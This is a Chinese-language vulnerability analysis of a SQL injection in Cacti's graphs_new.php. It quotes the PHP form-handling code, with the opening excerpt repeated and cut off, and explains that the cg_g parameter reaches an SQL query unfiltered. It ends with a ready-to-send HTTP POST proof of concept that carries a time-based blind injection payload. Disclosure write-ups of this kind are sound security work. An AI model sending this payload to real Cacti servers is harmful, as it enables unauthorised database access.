关键代码如下 ``` function form_save() { if (isset($_POST["save_component_graph"])) { /* summarize the 'create graph from host template/snmp index' stuff into an array */ while (list($var, $val) = each($_POST)) { if (preg_match('/^cg_(\d+)$/', $var, $matches)) { $selected_graphs["cg"]{$matches[1]}{$matches[1]} = true; //cg_g is not filtered }elseif (preg_match('/^cg_g$/', $var)) { if ($_POST["cg_g"] > 0) { $selected_graphs["cg"]{$_POST["cg_g"]}{$_POST["cg_g"]} = true; //给数组赋值 } }elseif (preg_match('/^sg_(\d+)_([a-f0-9]{32})$/', $var, $matches)) { $selected_graphs["sg"]{$matches[1]}{$_POST{"sgg_" . $matches[1]}}{$matches[2]} = true; } } if (isset($selected_graphs)) { host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);//调用漏洞函数 exit; } header("Location: graphs_new.php?host_id=" . $_POST["host_id"]); } if (isset($_POST["save_component_new_graphs"])) { host_new_graphs_save(); header("Location: graphs_new.php?host_id=" . $_POST["host_id"]); } } function...
关键代码如下 ``` function form_save() { if (isset($_POST["save_component_graph"])) { /* summarize the 'create graph from host template/snmp index' stuff into an array */ while (list($var, $val) = each($_POST)) { if (preg_match('/^cg_(\d+)$/', $var, $matches)) { $selected_graphs["cg"]{$matches[1]}{$matches[1]} = true; //cg_g is not filtered }elseif (preg_match('/^cg_g$/', $var)) { if ($_POST["cg_g"] > 0) { $selected_graphs["cg"]{$_POST["cg_g"]}{$_POST["cg_g"]} = true; //给数组赋值 } }elseif (preg_match('/^sg_(\d+)_([a-f0-9]{32})$/', $var, $matches)) { $selected_graphs["sg"]{$matches[1]}{$_POST{"sgg_" . $matches[1]}}{$matches[2]} = true; } } if (isset($selected_graphs)) { host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);//调用漏洞函数 exit; } header("Location: graphs_new.php?host_id=" . $_POST["host_id"]); } if (isset($_POST["save_component_new_graphs"])) { host_new_graphs_save(); header("Location: graphs_new.php?host_id=" . $_POST["host_id"]); } } function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) { /* we use object buffering on this page to allow redirection to another page if no fields are actually drawn */ ob_start(); include_once("./include/top_header.php"); print "<form method='post' action='graphs_new.php'>\n"; $snmp_query_id = 0; $num_output_fields = array(); while (list($form_type, $form_array) = each($selected_graphs_array)) {//便利数组 while (list($form_id1, $form_array2) = each($form_array)) {//继续便利数组,将数组中的key提取出来作为form_id1,form_id2 if ($form_type == "cg") { $graph_template_id = $form_id1; //赋值 //sql injection in graph_template_id html_start_box("<strong>Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "3", "center", "");//带入查询 }elseif ($form_type == "sg") { while (list($form_id2, $form_array3) = each($form_array2)) { /* ================= input validation ================= */ input_validate_input_number($snmp_query_id); /* ==================================================== */ $snmp_query_id = $form_id1; $snmp_query_graph_id = $form_id2; ``` 可以看到 graph_template_id 直接拼接到 SQL 语句中而没有过滤从而造成了 SQL 注入 ``` POC: POST /cacti/graphs_new.php HTTP/1.1 Host: 192.168.217.133 Content-Type: application/x-www-form-urlencoded Cookie: 1c4af7f2e90e3a789e67a8e3acd2372f=8a83va6ijomgf7qdgfpcl8l1p2; Cacti=j8chtc1ppq4n7viqkbah6c4tv2 Content-Length: 189 __csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save ```
